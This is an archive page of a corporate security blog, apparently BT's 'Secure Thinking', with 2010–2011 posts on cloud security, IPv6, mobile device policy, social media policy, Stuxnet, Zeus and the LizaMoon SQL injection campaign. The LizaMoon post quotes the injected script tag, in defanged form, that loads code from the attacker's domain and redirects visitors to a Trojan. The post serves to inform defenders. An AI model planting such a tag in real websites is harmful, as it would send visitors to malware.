- BT « Secure Thinking

Posts tagged - BT

Monday, June 6, 2011

Guest Post: The Mission of the Cloud Security Alliance

By Jim Reavis, Executive Director, Cloud Security Alliance

Cloud computing is all the rage today, even though many people are still confused about what it is.

Simply put, cloud is about using computing as a utility service with a pay-per-use model, with the ability to rapidly provision more or less compute and storage resources as needed. Cloud aligns the cost of computing with its usage. The primary value of cloud is not the obvious cost savings, but the agility to transform ideas into IT-enabled services in hours or days, versus taking months or years to do the same tasks with traditional IT.

However, the primary barrier to the adoption of any new information technology is the concern over security and trustworthiness, particularly a computer service that may be shared with many other organizations.

To that end, the Cloud Security Alliance was established in late 2008, with a mission to promote the use of best practices for providing security assurance within cloud computing, and provide education on the uses of cloud computing to help secure all other forms of computing. CSA is a global, non-profit association with over 20,000 members in over 40 chapters around the world.

CSA is focused on the rapid development of best practices to secure the cloud, educating the community on the latest research and encouraging innovation to secure the cloud of the future. We view our mandate as requiring a broad perspective, addressing governance, compliance and legal issues, as well as many different operational and technical concerns, including information lifecycle management, interoperability, identity management, encryption and virtualization.

We provide our research in the form of a wealth of free whitepapers and tools to simplify the architecture, adoption and assessment of secure cloud services. We also have a user certification, the Certificate of Cloud Security Knowledge (CCSK), an online examination to demonstrate one’s proficiency in cloud computing security issues and best practices. You can find out more at www.cloudsecurityalliance.org.

Tuesday, May 24, 2011

Take the Challenge

By Tara Savage, Senior Marketing Manager, BT Global Services

This week we’ve posted two pieces by Jill Knesek, BT’s CSO on why personal mobile devices do not foreshadow the downfall of corporate network integrity. The bottom line as Jill sees it is that the benefits of having an empowered and educated workforce who can respond to a business need or a client request instantly far outweigh the potential threats posed by supporting personal devices on the network. In fact, when her team conducted the risk analysis the threat posed by personal devices was no greater than by company-approved devices.

It seems like the topic of mobile device and application security and privacy is one of the hot topics at the moment, just ask the folks over at Apple and Google. Bruce Schneier, BT’s CSTO, alerted us to the Develop for Privacy challenge being run by the ACLU and the Tor Porect. In much the same way that Jill’s team seeks to educate BT’s employees about issues related security and privacy, this competition asks entrants to develop applications that will educate users about privacy issues related to mobile device use.

Are you interested in taking the challenge? The competition closes on May 31^st, 2011.

Good luck!

Wednesday, May 11, 2011

New SQL Injection Attack Dubbed LizaMoon Impacts Millions of Sites

By Karl Smith, Head of Cyber Security Assurance Services, Business Continuity, Security & Governance, BT

The recent “LizaMoon” attack started small and grew quickly. LizaMoon is an SQL injection attack campaign that adds “script src=hxxp://lizamoon.com/ur.php” along with other code into a website’s source code. This is causing the affected website to redirect a user to another website containing a Trojan.

Typically, web applications have filters that are designed to prevent rogue commands from passing through, but as seen with this attack, many don’t have these filters in place.

At first, the number of unique URLs affected by it was at 28,000, but that number has risen quickly, and more than 1.5 million websites have been hit.

Interestingly, one of them was iTunes, which has more users and more potential damage from this type of attack than most websites. Apple designed iTunes to automatically neutralize threats such as LizaMoon, but some conjecture that this attempt at hacking iTunes might “constitute an exploratory attack vector, designed to be part of a more sophisticated blended attack that could seek to exploit weakness within the iTunes client/software which would yield a far greater exploitation threshold of millions of infections in a matter of minutes/hours.”

Given that more than 220 million iPods have been sold across the globe, this scenario could become devastating quite quickly.

LizaMoon and like threats make it even more critical that organizations are proactively monitoring networks and remaining vigilant to possible threats, particularly given how many employees telecommute and use personal computing devices to access company networks.

Wednesday, April 13, 2011

Guest Blog: Security Up in the Clouds

By Nigel Hawthorn, Vice President EMEA Marketing, Blue Coat Systems (twitter.com/wheresnigel)

Innovative applications of cloud computing, including scalable, often virtualized storage, server and communications resources provisioned as a service over the Internet, are continuing to be deployed as organizations better understand this delivery model for IT services and its inherent benefits.

In the cybercriminal community, we see a cunning use of the cloud for dynamic threats – targeted, typically short-lived, using Web 2.0 techniques that rely upon dynamic links to spread malicious content, steal identities and money. Ninety percent of malware comes from hidden download pointers in trusted and popular Web sites; and each day in 2009, 15,000 new web pages were infected with malware.

Now, there are billions and billions of web pages, many of which – from news pages through blogs or search engine results – change literally in real time.

With a cybercriminal community busily injecting relays and malware through dynamic links, traditional reputation-based methods and definitions that download daily can’t hope to keep up. However, just as criminals can use the cloud to obfuscate their attacks, we should consider one very obvious strength of its Internet foundation – the community of more than one user that is united over the web.

If as soon as an attack is seen by one person on the web, that person could inform everyone else; then the most victims caught would be one. The criminals would find that it doesn’t pay, they’d move onto more lucrative crimes. What we need is a cloud-based system that tells us about existing threats and dynamically investigates new web pages on behalf of everyone working constantly with real-time intelligence on new sites, URLs and dynamic Web 2.0 content and links.

Of course the best way to gather that intelligence is from a broad, diverse and expanding community, connected by … you guessed it … the cloud. As a community under collective threat, we can take a collective responsibility. With cloud computing, we now have a mechanism for sharing that intelligence, sent anonymously into the cloud.

It makes sense to unite the power of the community as an input to a cloud-based ratings service, and leverage the cloud service as a delivery mechanism to update the filtering or scanning elements of your security layers as closely as possible to real time. And depending on what makes sense operationally, the technology that acts on this intelligence may be a laptop client, free consumer application or a dedicated, high performance appliance or some other hybrid deployment.

The cloud will become relevant and progressively influence each layer, but only after you have weighed up the operational and cost benefits with the security, privacy and performance considerations. Clearly, some options like community-driven cloud-delivered ratings should be considered right now to defend against the clear and present danger of Cybercrime 2.0.

A the year progresses, keep your options open but keep your eyes even more open and evolve your new defenses to be open to cloud computing, in an increasingly cloud-based hybrid approach.

Blue Coat Systems will be joining BT at Infosec 2011 along with other partners. As such, we will be featuring guest posts on SecureThinking and BT Viewpoint leading up to the event. If you are planning on attending the conference, come and find us at C92 (near the theatre and workshop area).

Monday, March 28, 2011

No Room at the Inn: IPv4 Makes Way for IPv6

By Sushila Nair, Product Manager, BT Counterpane

One of the largest landmarks in networking history is taking place. The Internet has run out of room and the last block of IPv4 have been handed over to the regional bodies that distribute them. The IPv4 Address Report predicts the date when those addresses will be distributed and the address pool is completely exhausted — and that very last address should be distributed this year.

At the very foundation of the Internet, there is an addressing scheme that enables us to send data from one node to another. With the number of new devices that have come onto the market and the growing mobile workforce, there has been a rapidly increasing demand on IP addresses. As a result, organizations are now being forced to change.

New companies that require public registered Internet addresses will be forced to use IPv6 addresses once all of the IPv4 addresses have been allocated. A large proportion of network equipment and operating systems are capable of running IPv6, and some come with the IPv6 stack enabled by default. Despite network equipment having been IPv6 capable for many years, a large proportion of applications and operational support systems are not — so moving to IPv6 is not a trivial task.

So now what? Well, it is important to recognize that there are some differences between IPv4 and IPv6:

Length of Addresses: IPv4 addresses are 32-bit addresses; an example address is — 131.27.18.9. IPv6 addresses are 128 bits long, written in hexadecimal, and separated by colons. An example would be — 2001:0:4137:9e76:1052:15a1:6c68:2852. The extensive number of addresses in IPv6 has removed the need for Network Address Translation (NAT), which opens up a new possibility of client-to-client application development as well as many new security issues.

Configuration of Addresses: IPv6 addresses can be auto-configurable, meaning the device will self-assign an address based on information received from its nearest router and its MAC (node) address.

Protocol Changes: ARP has changed and been replaced by NDP, the neighbor discovery protocol.

Advanced Security: IPSec is a mandatory component of IPv6; and IPv6 advanced security can be deployed by IT administrators immediately, without changing applications or networks.

In addition to these changes, there are other differences with IPv6 that one must prepare for, including support for quality of service, the use of multicast rather than broadcast and end-point fragmentation.

The changes in IPv6 result in a change in the attacks and vulnerabilities associated with the IP protocol stack. The simple process of discovering what nodes are on your network makes node discovery very challenging. An extremely large address space prohibits manually scanning for every possible host in the address space, so even the process of finding what nodes are on your network has changed. Beyond the challenges of host discovery is also the security issues raised by the fact that current network tools and devices are at varying stages of readiness for IPv6.

It is challenging for organizations to learn what will and won’t work in the new IP world. Organizations that are running default Windows configurations have IPv6 enabled by default. As IPv6 gains momentum, more and more devices will have both stacks enabled. Hackers are going to start targeting IPv6 — and if organizations are not controlling their addressing, scanning for vulnerabilities or have security policies and standards surrounding IPv6, they are going to be caught unprepared and unprotected.

Here on the SecureThinking blog, we will be running a series of articles highlighting IPv6 and the changes it will bring.

The IPv6 series will start with BT’s own IPv6 expert and published author, Tim Rooney, Director, Product Management, BT Diamond IP. We will offer an autographed book giveaway on IP address management, a crucial component of IPv6 security. We will also have guest bloggers share their perspectives on the changes that IPv6 will bring, as we lead up to World IPv6 Day.

Please feel free to also share your opinions and questions on the topic by posting a comment below. We know this issue will continue to drive discussion and interest in the community.

Wednesday, December 1, 2010

Innovation Series: If not Higher Education, then where?

By David Escalante, Director of Computer Policy & Security, Boston College

As part of a series on SecureThinking, we’ve recently focused on innovation. We’ve debated the pros and cons of innovation within large multinationals. One expert believed it was better to wait for a technology to be tried and proven before adoption. Another expert took the stance that organizations need to take the leap to get an edge on the competition. What impact does innovation have on other industries?

For this post, we are exploring innovation within the context of universities. We want to know if innovation in IT security is beneficial for universities — or is it better to wait until a technology becomes standard before implementing.

We took this question to an expert in the field and asked his opinion. David Escalante, Director of Computer Policy & Security at Boston College, asked if innovation doesn’t occur in Higher Education, then where else would it occur? Here is his opinion:

Innovation can indeed be a difficult subject to understand. One of the great dilemmas of innovation is the extent to which innovation is appropriate, dangerous or both when applied to one’s core business.

Higher education has, generally speaking, had a simple core business model for hundreds of years, with a teacher in front of a classroom. Innovation has occurred within the model in terms of how technology is used – think of copiers, whiteboards and more recently computers – but the subject at hand is not innovative teaching, but innovation within the security space. Also, it is worth noting that higher education has contributed significantly to basic research over many years, which has certainly spurred innovation in a variety of fields.

It sometimes seems that security vendors are buying other companies and coming out with new versions of their existing software rather than introducing interesting, innovative technologies to meet the continuously evolving security threats. And alas, major corporations seem to be busy doing the security compliance dance for their auditors and regulators rather than security innovation to better protect their assets and IP.

This leaves higher education as a sector that potentially can innovate in security. It has an audience of millions of students and faculty members to protect. And arguably, this audience neither expects nor requires the same level of security as say, a financial institution or the military, which allows some degree of flexibility in testing innovative approaches to security – a failure need not be catastrophic. Residential campuses also occupy a niche between needing to protect key assets like a business and to serve as an ISP for those living on-campus. In such an environment, some level of innovation is critical since the network and usage models meld classic business and ISP models.

Higher education has been innovating in network asset identification, doing primitive network asset identification and admission control before the term was even defined under the name, “NetReg.” It is also innovating in identity management, where the variety of campuses, individual roles, and joint research efforts has driven the need for federation. Some campuses are actively collaborating on new ways to combat malware. And the practice of removing users with malware from the network recently suggested by Scott Charney of Microsoft for ISPs has been used on many campuses for years now.

Curiously enough, however, much of this innovation is not driven by the specific recommendations one finds in texts on innovation. Rather, it is driven by a combination of intellectual curiosity, budget inequalities, a strong desire to mitigate the threat landscape, and, finally, by inter-institutional collaboration.

Security practitioners from various institutions get together, determine what their security issues are, and, depending upon their budget and abilities, attempt to develop solutions to the issues. Then they get together again, discuss what they’ve done and review new security issues that demand their attention. What works in some places will be tried in others, where it may or may not work.

In this way, innovation can proceed along the “just do it” approach while still being tested over time across multiple campuses where only the best solutions survive.

Wednesday, November 24, 2010

Top Attacks in 2010

By Rob Jamison, Manager – Network Intelligence, Managed Security Solutions Group, BT Global Services

Typically, at the end of each year, security professionals take a look back and decipher the top threats of the year. You may see a top 10 list or top five list, but ultimately, I believe there are really two major attacks to contend with in 2010 – or indeed, in any year. The first are attacks that try to steal money, and second are attacks that do something else. When I look back, Stuxnet and Zeus are examples of these top two attacks for this year.

Stuxnet and Zeus (Zbot) represent the pinnacle achievement of coordinated malware and are truly best-of-breed in what they do. While Operation Aurora and all sorts of target attacks utilizing blended approaches are occurring more frequently, Stuxnet and Zeus stand out 30 lengths away from the pack when we look back at 2010 and qualify what “really mattered.”

Stuxnet represents the science-fiction-is-now-reality genre of the past year. This worm/Trojan/Botnet has managed to fjord a major topological chasm which had held strong for several decades. Computerized systems that control physical machines may be vulnerable to targeted attack, but not the kind of internet-based, self-propagating one which is out of everyone’s control.

In jumping from PC based x86 architecture into Programmable Logic Controller (PLC) instruction sets, Stuxnet went where no worm had gone before. The authors of this worm have limited its destructive potential to physical systems using extremely specialized electronic motors; but in doing so, they have effectively and clearly rendered the blueprint of future attacks on Newtonian Mechanical Processes. Stuxnet is a trend setter in things to come, maliciously achieving what so many companies have been trying to do for so long — “Seamlessly Integrating Differing Computational Architectures into a Single Unified System…. and then Killing Them.”

Zeus is state-of-the-art Botnet software built for robbing banks. Zeus goes to where the money is — and goes there often. Zeus’ design, control and effectiveness against online banking countermeasures are outstanding, and resale of the software packages has allowed people with little technical initiative to harness the power and conduct sophisticated criminal schemes. More than 100 people in Zeus rings have been arrested this year to date, but these are the “mules” who are conducting the operator functions, not the architects of the program itself.

Since anyone with access to the internet and a little capital can now become a “Botnet Commander,” this year has lowered the barrier for entry of Botnet Commanders to the selection pool of those who can play video games or build a Facebook profile. Instead of a SimCity type game, the “player” is harvesting stolen credentials and capitalizing on vulnerabilities in authentication and authorization inherent to an antiquated financial system to move money around. The tool is continually tweaked and optimized by different groups of people than the ones using it for profit. The Automated Clearing House Network is ripe for abuse by this botnet, as the controls over ACH transfers and the presumption of authorization occurs with the transaction request, which can only be tested by single factor authentication.

What is on your list of top threats for this past year?

Please drop a comment below and share your thoughts with our readers.

Monday, November 22, 2010

The social media wake-up call

By Ben Rothke, Senior Security Consultant, BT Global Services

The action earlier this month from the National Labor Relations Board when a Connecticut woman was illegally fired from her job as an emergency medical technician after she posted disparaging remarks about her boss on Facebook is a big wake-up call – both for the employer and the employee.

An administrative law judge is expected to hear the case in January 2011, but it is likely not to end there, as the losing party will certainly appeal. It is expected that this case will make its way to the Supreme Court.

From an information security perspective, far too many firms wait for these kind of wake-up calls before taking action. Leading companies, however, will be proactive to ensure that the appropriate information security policies and guidelines are there from the beginning.

The truth is that the term “wake-up call” may understate the situation. This is a legal issue — and if organizations find themselves at the losing end of such a case, it can turn out to be an expensive proposition — lawyers’ fees, punitive damages, negative PR, regulatory findings, and more. Not being prepared can be an extremely expensive lesson.

The courts seem to be leaning to where comments in a social network setting are constitutionally protected speech, a factor that would allow employees to discuss their jobs and working conditions with co-workers. Those employee rights translate into responsibilities that employers must undertake.

As more employers and employees are using social networking sites, this is a most topical issue.

The way to deal with social networking in the workplace needs to be dealt with differently for the employer and employee.

For an employer, the following are a few of the many steps you need to take action on:

First off, get in front of the social media wave. Be proactive and assign a dedicated team to deal with the myriad issues around social networks.
As social networks blur boundaries between roles, policy and strategy are crucial. The border between the company and the outside world is evaporating, so your policy and strategy must reflect that. Two firms that have comprehensive social media guidelines are IBM and Intel.
Social networking policy is a must. Even if your course of action is to completely prohibit social networking, you still need a clear and established policy.
Create a rational, sensible program around your employees’ use of social media services. Make sure this includes photography and video, and common sense advice (don’t reference clients, customers, or partners without obtaining their express permission, etc.).
Human resources must be involved as social media can open a Pandora’s Box of HR issues. HR needs to create directives for managing personal and professional time and create reasonable guidelines. As part of the HR awareness process, explain how innocent social media postings can be misconstrued, how confidential data can accidently be shared, and other germane topics.
Social media security awareness is crucial. Don’t just give employees a generic five-slide PowerPoint. Follow the “three Cs” of information security awareness — make it clear, comprehensive and continuous.

For the employee:

For those new to Facebook, Twitter and other social media sites, curb your enthusiasm. This is especially true for those with OCD or addictive personalities who often don’t appreciate the addictive nature of social networking. Facebook is viral and indeed addictive — and as a salaried employee, don’t waste your workday on it.
Realize that Facebook and postings on other social sites can get you fired. When at work, realize that you are being paid to work. Don‘t abuse the trust your employer had in hiring you.
Most jobs in the US are at-will employment. This is a doctrine of American law that defines an employment relationship in which – a) either party can break the relationship with no liability, provided there was no express contract for a definite term governing the employment relationship; and b) that the employer does not belong to a collective bargaining group (i.e., has not recognized a union). Simply put, you are but one Facebook post away from losing your job.
Ensure you know about and are compliant with your employer’s social media guidelines. In the event you post something corporate, ensure that it is public information.
Take extra care if you “friend” your boss on Facebook

Social media is awesome, but it is undeniable that it has introduced significant information security and privacy risks and issues.

At the organizational level, companies must recognize these risks and take a formal approach to deal with them.

At the individual’s level, employees can’t be naïve about their responsibilities when using social media.

Wednesday, November 17, 2010

Introducing Agility into Modeling Security Risks

By Tara Savage, Global Security Marketing Manager, BT

In my previous post, I outlined the importance of agile security, especially as it relates to the complexity of global sourcing security requirements. In this post, I will address agility as part of modeling security risks.

In a recent article in Pulse magazine by the Institute of Information Security Professionals (IISP), Carl Colwill of the BT security team highlighted the importance of modeling security risks as it relates to global sourcing security requirements.

According to Carl, most business processes are a complex network of interrelationships between systems, applications and people. Assessments require detailed decomposition and dependency analysis to identify critical components and potential vulnerabilities. And risk profiles are likely to change when services are outsourced by an organization, even within the same country.

The increase in outsourcing presents a significant challenge for most companies. Indeed, outsourcing has transformed from an exception to a necessary and urgent priority to help companies meet their strategic goals. In general terms, the key business drivers relating to outsourcing are:

Environment – for example, regional and operational factors
User population – for example, the number of potential third-party attackers and the nature of the data access they will have

These key business drivers provide focus for risk model inputs, threat actors and attack scenarios. Both of these key drivers also provide focus for prioritizing risk mitigation controls.

Carl stated in the article:

It is also possible to identify those factors and variables that can be driven by assumptions, for example, baseline levels of security within strategic partners.

Focus on the outputs of risk assessments is equally important:

Security recommendations must support business decisions on outsourcing options, vendors, regions, and levels of protection

Mitigation controls must be chosen with long-term, end-to-end risk

Keep management and compliance requirements in mind and reuse existing standards

Each security control must be owned, implemented, monitored, and integrated into risk management, compliance and governance frameworks

Each control will have an implementation and in-life management cost

Global sourcing business drivers have stimulated innovation and automation for security risk assessments, communicating the results, identifying controls, and compliance regimes. Risk calculations have been made easier to use but without understanding and ownership of risk and the levels of protection implemented. This is why there are limitations of modeling tools since they are designed to aid decisions for preliminary assessments and should not be used to replace a detailed risk assessment.

In order for this to be effective, it must build upon an effective outsourcing compliance framework that is central to all security risk management considerations.

Tuesday, November 2, 2010

BT monitors and connects HeidelbergCement global network in 38 countries

By Toby Weir-Jones, Vice President of Product Development, Managed Security Solutions Group, BT Global Services

BT’s recent announcement of the expansion of services for HeidelbergCement, one of the world’s leading manufacturers of building materials, illustrates a popular usage model for large BT customers worldwide. BT’s Managed Security Monitoring services, powered by BT Counterpane, provide an overriding monitoring and audit capability for not only the customer’s own network and assets, but the BT network infrastructure operated on the customer’s behalf.

The services therefore provide double value, since the customer receives prompt and comprehensive security guidance on the activities of their protective infrastructure, and the network operator (BT in this case) also receives information which may help in isolating nodes that are raising network availability or reliability concerns.

BT’s contract with HeidelbergCement will extend that company’s international data network to cover a total of nearly 1,000 locations in 38 countries. In addition to the data network, BT will provide central access to the public Internet. The central Internet gateways, located in Germany and the U.S., will be monitored in real time using BT’s Managed Security Monitoring services, powered by BT Counterpane. BT’s managed network security monitoring combines a team of security experts, a rigorous process for incident detection and response, and best-of-breed technologies to provide organizations immediate feedback regarding the efficacy of a network’s security.

For more information about BT’s global security services, visit our Resource Center.